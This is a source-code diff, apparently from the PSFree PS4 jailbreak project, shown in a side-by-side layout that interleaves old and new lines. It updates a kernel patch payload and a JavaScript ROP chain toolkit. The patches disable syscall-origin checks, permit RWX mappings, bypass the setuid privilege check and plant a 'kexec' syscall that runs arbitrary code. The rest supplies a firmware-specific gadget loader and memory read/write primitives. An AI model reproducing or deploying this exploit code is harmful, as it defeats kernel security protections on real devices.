const size_t off_fast_syscall = 0x1c0; const size_t off_fast_syscall = 0x1c0;
void * const kbase = (void *)rdmsr(0xc0000082) - off_fast_syscall; void * const kbase = (void *)rdmsr(0xc0000082) - off_fast_syscall;
@@ -36,30 +60,39 @@ u64 kpatch(u64 res, u64 *error) {
// patch amd64_syscall() to allow calling syscalls everywhere // patch amd64_syscall() to allow calling syscalls everywhere
// mov ecx, 0xffffffff ; at 0x490, patch to "mov ecx, 0" // struct syscall_args sa; // initialized already
// mov rax, qword [r15 + 0x340] ; check if libkernel is loaded // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// test rax, rax // int is_invalid_syscall = 0
// je not_loaded
// ; 0x4b5 and 0x4b9 are replaced with NOPs so that we always reach
// ; 0x4c2
// ...
// je target ; at 0x4c2, patch je to jmp
// not_loaded:
// test ecx, ecx, ; ecx = 0, always jump to target
// je target
// ...
// target:
// test byte [rbx + 0x469], 2
// jne ...
// //
// Following the target code path, you will at one point reach this: // // check the calling code if it looks like one of the syscall stubs at a
// lea rsi, [rbp + 0x78] // // libkernel library and check if the syscall number correponds to the
// // proper stub
// if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
// || sa.code != (u32)(code >> 0x10)
// ) {
// // patch this to " = 0" instead
// is_invalid_syscall = -1;
// }
write32(kbase, 0x390, 0);
// these code corresponds to the check that ensures that the caller's
// instruction pointer is inside the libkernel library's memory range
//
// // patch the check to always go to the "goto do_syscall;" line
// void *code = td->td_frame->tf_rip;
// if (libkernel->start <= code && code < libkernel->end
// && is_invalid_syscall == 0
// ) {
// goto do_syscall;
// }
//
// do_syscall:
// ...
// lea rsi, [rbp - 0x78]
// mov rdi, rbx // mov rdi, rbx
// mov rax, qword [rbp + 0x80] // mov rax, qword [rbp - 0x80]
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args) // call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
// //
// sy_call() is the function that will execute the requested syscall. // sy_call() is the function that will execute the requested syscall.
write32(kbase, 0x490, 0);
write16(kbase, 0x4b5, 0x9090); write16(kbase, 0x4b5, 0x9090);
write16(kbase, 0x4b9, 0x9090); write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb); write8(kbase, 0x4c2, 0xeb);
@@ -68,36 +101,44 @@ u64 kpatch(u64 res, u64 *error) {
// patch maximum cpu mem protection: 0x33 -> 0x37 // patch maximum cpu mem protection: 0x33 -> 0x37
// the ps4 added custom protections for their gpu memory accesses // the ps4 added custom protections for their gpu memory accesses
// GPU R: 0x10, W: 0x20, X:, 0x40 // GPU X: 0x8 R: 0x10 W: 0x20
// that's why you see other bits set // that's why you see other bits set
write8(kbase, 0xfd03a, 0x37); // ref: https://cturt.github.io/ps4-2.html
write8(kbase, 0xfd03d, 0x37); write8(kbase, 0x16632A, 0x37);
write8(kbase, 0x16632D, 0x37);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
write32(kbase, 0x3ec68d, 0); //
// this check is skipped after the patch
//
// if ((new_prot & current->max_protection) != new_prot) {
// vm_map_unlock(map);
// return (KERN_PROTECTION_FAILURE);
// }
write32(kbase, 0x00080B8B, 0);
// patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ... // call ...
// mov r14, qword [rbp + 0xad0] // mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000 // cmp eax, 0x4000000
// jb ... ; patch je to jmp // jb ... ; patch jb to jmp
write8(kbase, 0x31953f, 0xeb); write8(kbase, 0x23B67F, 0xeb);
// patch called function to always return 0 // patch called function to always return 0
// //
// sys_dynlib_dlysm: // sys_dynlib_dlsym:
// ... // ...
// mov edi, 0x10 ; 16 // mov edi, 0x10 ; 16
// call patched_function ; kernel_base + 0x951c0 // call patched_function ; kernel_base + 0x221b40
// test eax, eax // test eax, eax
// je ... // je ...
// mov rax, qword [rbp + 0xad8] // mov rax, qword [rbp - 0xad8]
// ... // ...
// patched_function: ; patch to "xor eax, eax; ret" // patched_function: ; patch to "xor eax, eax; ret"
// push rbp // push rbp
// mov rbp, rsp // mov rbp, rsp
// ... // ...
write32(kbase, 0x951c0, 0xC3C03148); write32(kbase, 0x221b40, 0xC3C03148);
// patch sys_setuid() to allow freely changing the effective user ID // patch sys_setuid() to allow freely changing the effective user ID
@@ -105,7 +146,7 @@ u64 kpatch(u64 res, u64 *error) {
// call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0) // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
// test eax, eax // test eax, eax
// je ... ; patch je to jmp // je ... ; patch je to jmp
write8(kbase, 0x34d696, 0xeb); write8(kbase, 0x1A06, 0xeb);
// overwrite the entry of syscall 11 (unimplemented) in sysent // overwrite the entry of syscall 11 (unimplemented) in sysent
// //
@@ -116,13 +157,14 @@ u64 kpatch(u64 res, u64 *error) {
// u64 rcx; // u64 rcx;
// u64 r8; // u64 r8;
// u64 r9; // u64 r9;
// } // };
// //
// jumps to uap->rdi // int sys_kexec(struct thread td, struct args *uap) {
// u32 sys_kexec(struct thread td, struct args *uap) // asm("jmp qword ptr [rsi]");
// }
// sysent[11] // sysent[11]
const size_t offset_sysent_11 = 0x10fc6e0; const size_t offset_sysent_11 = 0x1100520;
// .sy_narg = 6 // .sy_narg = 6
write32(kbase, offset_sysent_11, 6); write32(kbase, offset_sysent_11, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]'] // .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -130,15 +172,5 @@ u64 kpatch(u64 res, u64 *error) {
// .sy_thrcnt = SY_THR_STATIC // .sy_thrcnt = SY_THR_STATIC
write32(kbase, offset_sysent_11 + 0x2c, 1); write32(kbase, offset_sysent_11 + 0x2c, 1);
// restore socketops.fo_chmod
// it was used initially to perform kernel code execution
write64(kbase, 0x1a76060, kbase + 0x3d0a60);
enable_cr0_wp(); enable_cr0_wp();
if (error != NULL) {
*error = 0;
}
end:
return res;
} }
kpatch/80x.d
+1
View File
@@ -0,0 +1 @@
80x.o 80x.d : 80x.c types.h utils.h
kernel/exfathax_pico.img → kpatch/80x.elf
BIN
View File
Binary file not shown.
kpatch/80x.o
BIN
View File
Binary file not shown.
kpatch/Makefile
+4 -6
View File
@@ -1,15 +1,15 @@
TARGET = 80x TARGET = 80x
ENTRY = 0x900000000 ENTRY = 0x900000000
src = $(TARGET).c
CC = gcc CC = gcc
CFLAGS = -O -Wno-int-conversion -fno-strict-aliasing -masm=intel -nostartfiles
CFLAGS += -fwrapv -no-pie -Ttext=$(ENTRY) -Tscript.ld -Wl,--build-id=none
CFLAGS += -fwrapv-pointer -std=gnu11
.PHONY: all .PHONY: all
all: $(TARGET).elf all: $(TARGET).elf
CFLAGS = -O -Wno-int-conversion -fno-strict-aliasing -masm=intel -nostartfiles
CFLAGS += -fwrapv -no-pie -Ttext=$(ENTRY) -Tscript.ld -Wl,--build-id=none
CFLAGS += -fwrapv-pointer
$(TARGET).elf: $(TARGET).o $(TARGET).elf: $(TARGET).o
$(CC) $(TARGET).o -o $(TARGET).elf $(CFLAGS) $(CC) $(TARGET).o -o $(TARGET).elf $(CFLAGS)
@@ -24,6 +24,4 @@ clean:
sed 's,\($*\)\.o[ :]*,\1.o $@ : ,g' < $@.$$$$ > $@; \ sed 's,\($*\)\.o[ :]*,\1.o $@ : ,g' < $@.$$$$ > $@; \
rm -f $@.$$$$; rm -f $@.$$$$;
src = $(TARGET).c
include $(src:.c=.d) include $(src:.c=.d)
kpatch/utils.h
+1 -1
View File
@@ -24,7 +24,7 @@ along with this program. If not, see <https://www.gnu.org/licenses/>. */
inline u64 rdmsr(u32 msr) { inline u64 rdmsr(u32 msr) {
u32 low, high; u32 low, high;
__asm __volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (msr)); asm("rdmsr" : "=a" (low), "=d" (high) : "c" (msr));
return (low | ((u64)high << 32)); return (low | ((u64)high << 32));
} }
module/chain.mjs
+459 -83
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -15,46 +15,82 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */ along with this program. If not, see <https://www.gnu.org/licenses/>. */
import { Int } from './int64.mjs'; import { Int, lohi_from_one } from './int64.mjs';
import { get_view_vector } from './memtools.mjs'; import { get_view_vector } from './memtools.mjs';
import { Addr, mem } from './mem.mjs'; import { Addr } from './mem.mjs';
import { import * as config from '/config.mjs';
read64,
write64,
} from './rw.mjs';
import * as o from './offset.mjs';
// put the sycall names that you want to use here // put the sycall names that you want to use here
export const syscall_map = new Map(Object.entries({ export const syscall_map = new Map(Object.entries({
'close': 6, 'read' : 3,
'write' : 4,
'open' : 5,
'close' : 6,
'getpid' : 20,
'setuid' : 23, 'setuid' : 23,
'getuid' : 24, 'getuid' : 24,
'mprotect': 74, 'accept' : 30,
'pipe' : 42,
'ioctl' : 54,
'munmap' : 73,
'mprotect' : 74,
'fcntl' : 92,
'socket' : 97, 'socket' : 97,
'connect' : 98,
'bind' : 104,
'setsockopt' : 105,
'listen' : 106,
'getsockopt' : 118,
'fchmod' : 124, 'fchmod' : 124,
'socketpair' : 135,
'fstat' : 189,
'getdirentries' : 196,
'__sysctl' : 202,
'mlock' : 203, 'mlock' : 203,
'clock_gettime' : 232,
'nanosleep' : 240,
'sched_yield' : 331,
'kqueue' : 362, 'kqueue' : 362,
'kevent' : 363, 'kevent' : 363,
'rtprio_thread' : 466,
'mmap' : 477, 'mmap' : 477,
// for JIT shared memory 'ftruncate' : 480,
'shm_open' : 482,
'cpuset_getaffinity' : 487,
'cpuset_setaffinity' : 488,
'jitshm_create' : 533, 'jitshm_create' : 533,
'jitshm_alias' : 534, 'jitshm_alias' : 534,
'evf_create' : 538,
'evf_delete' : 539,
'evf_set' : 544,
'evf_clear' : 545,
'set_vm_container' : 559,
'dmem_container' : 586,
'dynlib_dlsym' : 591,
'dynlib_get_list' : 592,
'dynlib_get_info' : 593,
'dynlib_load_prx' : 594,
'randomized_path' : 602,
'budget_get_ptype' : 610,
'thr_suspend_ucontext' : 632,
'thr_resume_ucontext' : 633,
'blockpool_open' : 653,
'blockpool_map' : 654,
'blockpool_unmap' : 655,
'blockpool_batch' : 657,
// syscall 661 is unimplemented so free for use. a kernel exploit will
// install "kexec" here
'aio_submit' : 661,
'kexec' : 661,
'aio_multi_delete' : 662,
'aio_multi_wait' : 663,
'aio_multi_poll' : 664,
'aio_multi_cancel' : 666,
'aio_submit_cmd' : 669,
'blockpool_move' : 673,
})); }));
// Extra space to allow a ROP chain to push temporary values. It must pop all
// of it before reaching a "ret" instruction, else the instruction will pop one
// of the temporaries as its return address.
//
// Also space for additional frames when we call a function since we do not
// pivot the call to another stack (the called function's stack pointer is
// pointing to our ROP stack as well).
const upper_pad = 0x10000;
// maximum size of the ROP stack
const stack_size = 0x10000;
const total_size = upper_pad + stack_size;
const argument_pops = [ const argument_pops = [
'pop rdi; ret', 'pop rdi; ret',
'pop rsi; ret', 'pop rsi; ret',
@@ -64,49 +100,190 @@ const argument_pops = [
'pop r9; ret', 'pop r9; ret',
]; ];
// implementations are expected to have these gadgets:
// * libSceLibcInternal:
// * __errno - FreeBSD's function to get the location of errno
// * setcontext - what we call Sony's own version of _Ux86_64_setcontext
// * getcontext - what we call Sony's own version of _Ux86_64_getcontext
// * anywhere:
// * the gadgets at argument_pops
// * ret
//
// setcontext/getcontext naming came from this project:
// https://github.com/libunwind/libunwind
//
// setcontext(context *ctx):
// mov rax, qword [rdi + 0x38]
// sub rax, 0x10 ; 16
// mov qword [rdi + 0x38], rax
// mov rbx, qword [rdi + 0x20]
// mov qword [rax], rbx
// mov rbx, qword [rdi + 0x80]
// mov qword [rax + 8], rbx
// mov rax, qword [rdi]
// mov rbx, qword [rdi + 8]
// mov rcx, qword [rdi + 0x10]
// mov rdx, qword [rdi + 0x18]
// mov rsi, qword [rdi + 0x28]
// mov rbp, qword [rdi + 0x30]
// mov r8, qword [rdi + 0x40]
// mov r9, qword [rdi + 0x48]
// mov r10, qword [rdi + 0x50]
// mov r11, qword [rdi + 0x58]
// mov r12, qword [rdi + 0x60]
// mov r13, qword [rdi + 0x68]
// mov r14, qword [rdi + 0x70]
// mov r15, qword [rdi + 0x78]
// cmp qword [rdi + 0xb0], 0x20001
// jne done
// cmp qword [rdi + 0xb8], 0x10002
// jne done
// fxrstor [rdi + 0xc0]
// done:
// mov rsp, qword [rdi + 0x38]
// pop rdi
// ret
//
// getcontext(context *ctx):
// mov qword [rdi], rax
// mov qword [rdi + 8], rbx
// mov qword [rdi + 0x10], rcx
// mov qword [rdi + 0x18], rdx
// mov qword [rdi + 0x20], rdi
// mov qword [rdi + 0x28], rsi
// mov qword [rdi + 0x30], rbp
// mov qword [rdi + 0x38], rsp
// add qword [rdi + 0x38], 8
// mov qword [rdi + 0x40], r8
// mov qword [rdi + 0x48], r9
// mov qword [rdi + 0x50], r10
// mov qword [rdi + 0x58], r11
// mov qword [rdi + 0x60], r12
// mov qword [rdi + 0x68], r13
// mov qword [rdi + 0x70], r14
// mov qword [rdi + 0x78], r15
// mov rsi, qword [rsp]
// mov qword [rdi + 0x80], rsi
// fxsave [rdi + 0xc0]
// mov qword [rdi + 0xb0], 0x20001
// mov qword [rdi + 0xb8], 0x10002
// xor eax, eax
// ret
// ROP chain manager base class
//
// Args:
// stack_size: the size of the stack
// upper_pad: the amount of extra space above stack
export class ChainBase { export class ChainBase {
constructor() { constructor(stack_size=0x1000, upper_pad=0x10000) {
this.is_stale = false; this._is_dirty = false;
this.position = 0; this.position = 0;
this._return_value = new Uint8Array(8);
this.retval_addr = get_view_vector(this._return_value);
const stack_buffer = new ArrayBuffer(total_size); const return_value = new Uint32Array(4);
this.stack_buffer = stack_buffer; this._return_value = return_value;
this.stack = new Uint8Array(stack_buffer, upper_pad, stack_size); this.retval_addr = get_view_vector(return_value);
this.stack_addr = get_view_vector(this.stack);
const errno = new Uint32Array(1);
this._errno = errno;
this.errno_addr = get_view_vector(errno);
const full_stack_size = upper_pad + stack_size;
const stack_buffer = new ArrayBuffer(full_stack_size);
const stack = new DataView(stack_buffer, upper_pad);
this.stack = stack;
this.stack_addr = get_view_vector(stack);
this.stack_size = stack_size;
this.full_stack_size = full_stack_size;
} }
check_stale() { // use this if you want to write a new ROP chain but don't want to allocate
if (this.is_stale) { // a new instance
throw Error('chain already ran, clean it first'); empty() {
} this.position = 0;
this.is_stale = true;
} }
check_is_empty() { // flag indicating whether .run() was ever called with this chain
if (this.position === 0) { get is_dirty() {
throw Error('chain is empty'); return this._is_dirty;
}
} }
clean() { clean() {
this.position = 0; this._is_dirty = false;
this.is_stale = false; }
dirty() {
this._is_dirty = true;
}
check_allow_run() {
if (this.position === 0) {
throw Error('chain is empty');
}
if (this.is_dirty) {
throw Error('chain already ran, clean it first');
}
}
reset() {
this.empty();
this.clean();
}
get retval_int() {
return this._return_value[0] | 0;
}
get retval() {
return new Int(this._return_value[0], this._return_value[1]);
}
// return value as a pointer
get retval_ptr() {
return new Addr(this._return_value[0], this._return_value[1]);
}
set retval(value) {
const values = lohi_from_one(value);
const retval = this._return_value;
retval[0] = values[0];
retval[1] = values[1];
}
get retval_all() {
const retval = this._return_value;
return [new Int(retval[0], retval[1]), new Int(retval[2], retval[3])];
}
set retval_all(values) {
const [a, b] = [lohi_from_one(values[0]), lohi_from_one(values[1])];
const retval = this._return_value;
retval[0] = a[0];
retval[1] = a[1];
retval[2] = b[0];
retval[3] = b[1];
}
get errno() {
return this._errno[0];
}
set errno(value) {
this._errno[0] = value;
} }
// this will raise an error if the value is not an Int
push_value(value) { push_value(value) {
if (this.position >= stack_size) { const position = this.position;
if (position >= this.stack_size) {
throw Error(`no more space on the stack, pushed value: ${value}`); throw Error(`no more space on the stack, pushed value: ${value}`);
} }
write64(this.stack, this.position, value);
this.position += 8;
}
// converts value to Int first const values = lohi_from_one(value);
push_constant(value) { const stack = this.stack;
this.push_value(new Int(value)); stack.setUint32(position, values[0], true);
stack.setUint32(position + 4, values[1], true);
this.position += 8;
} }
get_gadget(insn_str) { get_gadget(insn_str) {
@@ -125,14 +302,13 @@ export class ChainBase {
push_call(func_addr, ...args) { push_call(func_addr, ...args) {
if (args.length > 6) { if (args.length > 6) {
throw TypeError( throw TypeError(
'call() does not support functions that have more than 6' 'push_call() does not support functions that have more than 6'
+ ' arguments' + ' arguments');
);
} }
for (let i = 0; i < args.length; i++) { for (let i = 0; i < args.length; i++) {
this.push_gadget(argument_pops[i]); this.push_gadget(argument_pops[i]);
this.push_constant(args[i]); this.push_value(args[i]);
} }
// The address of our buffer seems to be always aligned to 8 bytes. // The address of our buffer seems to be always aligned to 8 bytes.
@@ -143,7 +319,11 @@ export class ChainBase {
this.push_gadget('ret'); this.push_gadget('ret');
} }
this.push_value(func_addr); if (typeof func_addr === 'string') {
this.push_gadget(func_addr);
} else {
this.push_value(func_addr);
}
} }
push_syscall(syscall_name, ...args) { push_syscall(syscall_name, ...args) {
@@ -164,43 +344,239 @@ export class ChainBase {
this.push_call(syscall_addr, ...args); this.push_call(syscall_addr, ...args);
} }
// ROP chain to retrieve rax
push_get_retval() {
throw Error('push_get_retval() not implemented');
}
// Firmware specific method to launch a ROP chain
//
// Implementations must call check_stale() and check_is_empty() before
// trying to launch the chain.
run() {
throw Error('run() not implemented');
}
get return_value() {
return read64(this._return_value, 0);
}
// Sets needed class properties // Sets needed class properties
// //
// Args: // Args:
// gadgets: // gadgets:
// A Map-like object mapping instruction strings (e.g "pop rax; ret") // A Map-like object mapping instruction strings (e.g. "pop rax; ret")
// to their addresses in memory. // to their addresses in memory.
// syscall_array: // syscall_array:
// An array whose indices correspond to syscall numbers. Maps syscall // An array whose indices correspond to syscall numbers. Maps syscall
// numbers to their addresses in memory. Defaults to an empty Array. // numbers to their addresses in memory. Defaults to an empty Array.
//
// Raises:
// Error:
// For missing bare minimum gadgets
static init_class(gadgets, syscall_array=[]) { static init_class(gadgets, syscall_array=[]) {
for (const insn of argument_pops) {
if (!gadgets.has(insn)) {
throw Error(`gadget map must contain this gadget: ${insn}`);
}
}
this.prototype.gadgets = gadgets; this.prototype.gadgets = gadgets;
this.prototype.syscall_array = syscall_array; this.prototype.syscall_array = syscall_array;
} }
// START: implementation-dependent parts
//
// the user doesn't need to implement all of these. just the ones they need
// Firmware specific method to launch a ROP chain
//
// Proper implementations will check if .position is nonzero before
// running. Implementations can optionally check .is_dirty to enforce
// single-run gadget sequences
run() {
throw Error('not implemented');
}
// anything you need to do before the ROP chain jumps back to JavaScript
push_end() {
throw Error('not implemented');
}
push_get_errno() {
throw Error('not implemented');
}
push_clear_errno() {
throw Error('not implemented');
}
// get the rax register
push_get_retval() {
throw Error('not implemented');
}
// get the rax and rdx registers
push_get_retval_all() {
throw Error('not implemented');
}
// END: implementation-dependent parts
// note that later firmwares (starting around > 5.00?), the browser doesn't
// have a JIT compiler. we programmed in a way that tries to make the
// resulting bytecode be optimal
//
// we intentionally have an incomplete set (there's no function to get a
// full 128-bit result). we only implemented what we think are the common
// cases. the user will have to implement those other functions if they
// need it
do_call(...args) {
if (this.position) {
throw Error('chain not empty');
}
try {
this.push_call(...args);
this.push_get_retval();
this.push_get_errno();
this.push_end();
this.run();
} finally {
this.reset();
}
}
call_void(...args) {
this.do_call(...args);
}
call_int(...args) {
this.do_call(...args);
// x | 0 will always be a signed integer
return this._return_value[0] | 0;
}
call(...args) {
this.do_call(...args);
const retval = this._return_value;
return new Int(retval[0], retval[1]);
}
do_syscall(...args) {
if (this.position) {
throw Error('chain not empty');
}
try {
this.push_syscall(...args);
this.push_get_retval();
this.push_get_errno();
this.push_end();
this.run();
} finally {
this.reset();
}
}
syscall_void(...args) {
this.do_syscall(...args);
}
syscall_int(...args) {
this.do_syscall(...args);
// x | 0 will always be a signed integer
return this._return_value[0] | 0;
}
syscall(...args) {
this.do_syscall(...args);
const retval = this._return_value;
return new Int(retval[0], retval[1]);
}
syscall_ptr(...args) {
this.do_syscall(...args);
const retval = this._return_value;
return new Addr(retval[0], retval[1]);
}
// syscall variants that throw an error on errno
do_syscall_clear_errno(...args) {
if (this.position) {
throw Error('chain not empty');
}
try {
this.push_clear_errno();
this.push_syscall(...args);
this.push_get_retval();
this.push_get_errno();
this.push_end();
this.run();
} finally {
this.reset();
}
}
sysi(...args) {
const errno = this._errno;
this.do_syscall_clear_errno(...args);
const err = errno[0];
if (err !== 0) {
throw Error(`syscall(${args[0]}) errno: ${err}`);
}
// x | 0 will always be a signed integer
return this._return_value[0] | 0;
}
sys(...args) {
const errno = this._errno;
this.do_syscall_clear_errno(...args);
const err = errno[0];
if (err !== 0) {
throw Error(`syscall(${args[0]}) errno: ${err}`);
}
const retval = this._return_value;
return new Int(retval[0], retval[1]);
}
sysp(...args) {
const errno = this._errno;
this.do_syscall_clear_errno(...args);
const err = errno[0];
if (err !== 0) {
throw Error(`syscall(${args[0]}) errno: ${err}`);
}
const retval = this._return_value;
return new Addr(retval[0], retval[1]);
}
}
export function get_gadget(map, insn_str) {
const addr = map.get(insn_str);
if (addr === undefined) {
throw Error(`gadget not found: ${insn_str}`);
}
return addr;
}
function load_fw_specific(version) {
if (version & 0x10000) {
throw RangeError('ps5 not supported yet');
}
const value = version & 0xffff;
// we don't want to bother with very old firmwares that don't support
// ECMAScript 2015. 6.xx WebKit poisons the pointer fields of some types
// which can be annoying to deal with
if (value < 0x700) {
throw RangeError("PS4 firmwares < 7.00 isn't supported");
}
if (0x800 <= value && value <= 0x900) {
return import('/rop/900.mjs');
}
throw RangeError('firmware not supported');
}
export let gadgets = null;
export let libwebkit_base = null;
export let libkernel_base = null;
export let libc_base = null;
export let init_gadget_map = null;
export let Chain = null;
export async function init() {
const module = await load_fw_specific(config.target);
Chain = module.Chain;
module.init(Chain);
({
gadgets,
libwebkit_base,
libkernel_base,
libc_base,
init_gadget_map,
} = module);
} }
module/int64.mjs
+86 -151
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -15,184 +15,119 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */ along with this program. If not, see <https://www.gnu.org/licenses/>. */
function check_range(x) { // cache some constants
return (-0x80000000 <= x) && (x <= 0xffffffff); const isInteger = Number.isInteger;
function check_not_in_range(x) {
return !(isInteger(x) && -0x80000000 <= x && x <= 0xffffffff);
} }
function unhexlify(hexstr) { // use this if you want to support objects convertible to Int but only need
if (hexstr.substring(0, 2) === "0x") { // their low/high bits. creating a Int is slower compared to just using this
hexstr = hexstr.substring(2); // function
} export function lohi_from_one(low) {
if (hexstr.length % 2 === 1) { if (low instanceof Int) {
hexstr = '0' + hexstr; return low._u32.slice();
}
if (hexstr.length % 2 === 1) {
throw TypeError("Invalid hex string");
} }
let bytes = new Uint8Array(hexstr.length / 2); if (check_not_in_range(low)) {
for (let i = 0; i < hexstr.length; i += 2) { throw TypeError(`low not a 32-bit integer: ${low}`);
let new_i = hexstr.length - 2 - i;
let substr = hexstr.slice(new_i, new_i + 2);
bytes[i / 2] = parseInt(substr, 16);
} }
return bytes; return [low >>> 0, low < 0 ? -1 >>> 0 : 0];
}
// Decorator for Int instance operations. Takes care
// of converting arguments to Int instances if required.
function operation(f, nargs) {
return function () {
if (arguments.length !== nargs)
throw Error("Not enough arguments for function " + f.name);
let new_args = [];
for (let i = 0; i < arguments.length; i++) {
if (!(arguments[i] instanceof Int)) {
new_args[i] = new Int(arguments[i]);
} else {
new_args[i] = arguments[i];
}
}
return f.apply(this, new_args);
};
} }
// immutable 64-bit integer
export class Int { export class Int {
constructor(low, high) { constructor(low, high) {
let buffer = new Uint32Array(2); if (high === undefined) {
let bytes = new Uint8Array(buffer.buffer); this._u32 = new Uint32Array(lohi_from_one(low));
return;
if (arguments.length > 2) {
throw TypeError('Int takes at most 2 args');
}
if (arguments.length === 0) {
throw TypeError('Int takes at min 1 args');
}
let is_one = false;
if (arguments.length === 1) {
is_one = true;
} }
if (!is_one) { if (check_not_in_range(low)) {
if (typeof (low) !== 'number' throw TypeError(`low not a 32-bit integer: ${low}`);
&& typeof (high) !== 'number') {
throw TypeError('low/high must be numbers');
}
} }
if (typeof low === 'number') { if (check_not_in_range(high)) {
if (!check_range(low)) { throw TypeError(`high not a 32-bit integer: ${high}`);
throw TypeError('low not a valid value: ' + low);
}
if (is_one) {
high = 0;
if (low < 0) {
high = -1;
}
} else {
if (!check_range(high)) {
throw TypeError('high not a valid value: ' + high);
}
}
buffer[0] = low;
buffer[1] = high;
} else if (typeof low === 'string') {
bytes.set(unhexlify(low));
} else if (typeof low === 'object') {
if (low instanceof Int) {
bytes.set(low.bytes);
} else {
if (low.length !== 8)
throw TypeError("Array must have exactly 8 elements.");
bytes.set(low);
}
} else {
throw TypeError('Int does not support your object for conversion');
} }
this.buffer = buffer; this._u32 = new Uint32Array([low, high]);
this.bytes = bytes;
this.eq = operation(function eq(b) {
const a = this;
return a.low() === b.low() && a.high() === b.high();
}, 1);
this.neg = operation(function neg() {
let type = this.constructor;
let low = ~this.low();
let high = ~this.high();
let res = (new Int(low, high)).add(1);
return new type(res);
}, 0);
this.add = operation(function add(b) {
let type = this.constructor;
let low = this.low();
let high = this.high();
low += b.low();
let carry = 0;
if (low > 0xffffffff) {
carry = 1;
}
high += carry + b.high();
low &= 0xffffffff;
high &= 0xffffffff;
return new type(low, high);
}, 1);
this.sub = operation(function sub(b) {
let type = this.constructor;
b = b.neg();
let low = this.low();
let high = this.high();
low += b.low();
let carry = 0;
if (low > 0xffffffff) {
carry = 1;
}
high += carry + b.high();
low &= 0xffffffff;
high &= 0xffffffff;
return new type(low, high);
}, 1);
} }
low() { get lo() {
return this.buffer[0]; return this._u32[0];
} }
high() { get hi() {
return this.buffer[1]; return this._u32[1];
} }
toString(is_pretty) { // return low/high as signed integers
get bot() {
return this._u32[0] | 0;
}
get top() {
return this._u32[1] | 0;
}
neg() {
const u32 = this._u32;
const low = (~u32[0] >>> 0) + 1;
return new this.constructor(
low >>> 0,
((~u32[1] >>> 0) + (low > 0xffffffff)) >>> 0,
);
}
eq(b) {
const values = lohi_from_one(b);
const u32 = this._u32;
return (
u32[0] === values[0]
&& u32[1] === values[1]
);
}
ne(b) {
return !this.eq(b);
}
add(b) {
const values = lohi_from_one(b);
const u32 = this._u32;
const low = u32[0] + values[0];
return new this.constructor(
low >>> 0,
(u32[1] + values[1] + (low > 0xffffffff)) >>> 0,
);
}
sub(b) {
const values = lohi_from_one(b);
const u32 = this._u32;
const low = u32[0] + (~values[0] >>> 0) + 1;
return new this.constructor(
low >>> 0,
(u32[1] + (~values[1] >>> 0) + (low > 0xffffffff)) >>> 0,
);
}
toString(is_pretty=false) {
if (!is_pretty) { if (!is_pretty) {
let low = this.low().toString(16).padStart(8, '0'); const low = this.lo.toString(16).padStart(8, '0');
let high = this.high().toString(16).padStart(8, '0'); const high = this.hi.toString(16).padStart(8, '0');
return '0x' + high + low; return '0x' + high + low;
} }
let high = this.high().toString(16).padStart(8, '0'); let high = this.hi.toString(16).padStart(8, '0');
high = high.substring(0, 4) + '_' + high.substring(4); high = high.substring(0, 4) + '_' + high.substring(4);
let low = this.low().toString(16).padStart(8, '0'); let low = this.lo.toString(16).padStart(8, '0');
low = low.substring(0, 4) + '_' + low.substring(4); low = low.substring(0, 4) + '_' + low.substring(4);
return '0x' + high + '_' + low; return '0x' + high + '_' + low;
} }
} }
Int.Zero = new Int(0);
Int.One = new Int(1);
module/mem.mjs
+325 -123
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023-2024 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -15,214 +15,416 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */ along with this program. If not, see <https://www.gnu.org/licenses/>. */
import { Int } from './int64.mjs'; import { Int, lohi_from_one } from './int64.mjs';
import { import { view_m_vector, view_m_length } from './offset.mjs';
read16,
read32,
read64,
write16,
write32,
write64,
} from './rw.mjs';
import * as o from './offset.mjs';
export let mem = null; export let mem = null;
// cache some constants
const off_vector = view_m_vector / 4;
const off_vector2 = (view_m_vector + 4) / 4;
const isInteger = Number.isInteger;
function init_module(memory) { function init_module(memory) {
mem = memory; mem = memory;
} }
function add_and_set_addr(mem, offset, base_lo, base_hi) {
const values = lohi_from_one(offset);
const main = mem._main;
const low = base_lo + values[0];
// no need to use ">>> 0" to convert to unsigned here
main[off_vector] = low;
main[off_vector2] = base_hi + values[1] + (low > 0xffffffff);
}
export class Addr extends Int { export class Addr extends Int {
read8(offset) { read8(offset) {
const addr = this.add(offset); const m = mem;
return mem.read8(addr); if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
return m.read8_at(offset);
} }
read16(offset) { read16(offset) {
const addr = this.add(offset); const m = mem;
return mem.read16(addr); if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
m._set_addr_direct(this);
} else {
add_and_set_addr(m, offset, this.lo, this.hi);
offset = 0;
}
return m.read16_at(offset);
} }
read32(offset) { read32(offset) {
